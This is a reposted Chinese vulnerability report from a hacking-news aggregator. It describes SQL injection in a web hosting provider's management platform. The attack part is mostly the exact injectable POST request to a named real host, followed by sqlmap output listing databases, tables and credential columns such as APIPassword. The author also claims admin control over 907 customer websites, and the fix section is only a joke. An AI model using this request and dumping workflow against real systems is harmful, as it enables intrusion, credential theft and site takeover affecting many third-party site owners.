记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

时代互联某管理平台SQL注入导致近千网站沦陷

2015-09-21 21:00

注入点

code 区域
POST /admin.php/website/check HTTP/1.1

Content-Length: 328

Content-Type: application/x-www-form-urlencoded

Host: a.now.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*



submit=%e6%8f%90%e4%ba%a4&bind_status=3&id=*





数据库

code 区域
available databases [11]:

[*] #mysql50#lost+found

[*] #mysql50#webphone.bak20150806

[*] db_now_net_cn

[*] information_schema

[*] mysql

[*] performance_schema

[*] proftpd

[*] test

[*] webphone

[*] webphone_bak

[*] webphone_center







code 区域
Database: db_now_net_cn

[16 tables]

+----------------+

| APIControl |

| Albums |

| ApacheLog |

| ApacheLog_more |

| JTomcat |

| Options |

| Photos |

| Security |

| VDNS |

| VDNSI |

| VHostLog |

| VHostReferring |

| VHostServer |

| VHostServer_M |

| VHostSub |

| VHostSub_M |

+----------------+





网站信息

code 区域
Database: db_now_net_cn

Table: APIControl

[13 columns]

+-------------+-------------+

| Column | Type |

+-------------+-------------+

| APIContact | varchar(30) |

| APIHost | varchar(60) |

| APILogin | varchar(30) |

| APIName | varchar(50) |

| APIPassword | varchar(33) |

| APIPort | varchar(6) |

| chrEmail | varchar(30) |

| chrTel | varchar(30) |

| cltrid | int(11) |

| dtUpdate | datetime |

| IDAPI | int(11) |

| intActive | tinyint(4) |

| intMoney | int(11) |

+-------------+-------------+







907个网站

code 区域
Database: webphone_center

+--------------------+---------+

| Table | Entries |

+--------------------+---------+

| wp_admin_log | 2897 |

| wp_website | 907 |

| wp_themes | 26 |

| wp_themes_category | 11 |

| wp_admin | 1 |

+--------------------+---------+





还有个7036张表的数据库,懒得跑了

code 区域
web application technology: PHP 5.5.18, Apache 2.4.10

back-end DBMS: MySQL 5.0

[22:47:36] [WARNING] missing table parameter, sqlmap will retrieve the number of

entries for all database management system databases' tables

[22:47:36] [INFO] fetching tables for database: 'webphone_bak'

[22:47:36] [INFO] the SQL query used returns 7036 entries

[22:47:37] [WARNING] reflective value(s) found and filtering out

[22:47:37] [INFO] retrieved: np_002_hr_category

[22:47:37] [INFO] retrieved: np_200_hr_category

[22:47:37] [INFO] retrieved: np_200_hr_company

[22:47:38] [INFO] retrieved: np_200_hr_job

[22:47:38] [INFO] retrieved: np_200_hr_list

[22:47:38] [INFO] retrieved: np_200_link

[22:47:39] [INFO] retrieved: np_200_nav

[22:47:39] [INFO] retrieved: np_200_page

[22:47:39] [INFO] retrieved: np_200_product

[22:47:40] [INFO] retrieved: np_200_product_category

[22:47:40] [INFO] retrieved: np_200_show

[22:47:40] [INFO] retrieved: np_2013_admin

[22:47:41] [INFO] retrieved: np_2013_admin_log

[22:47:41] [INFO] retrieved: np_2013_article

漏洞证明:

登陆一下

服务器配置

QQ图片20150806235215.png



网站信息

QQ图片20150806235256.png



权限很大啊,可直接关闭,删除

QQ图片20150806235321.png



修复方案:

23333

知识来源: www.wooyun.org/bugs/wooyun-2015-0132364

阅读:87048 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“时代互联某管理平台SQL注入导致近千网站沦陷”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词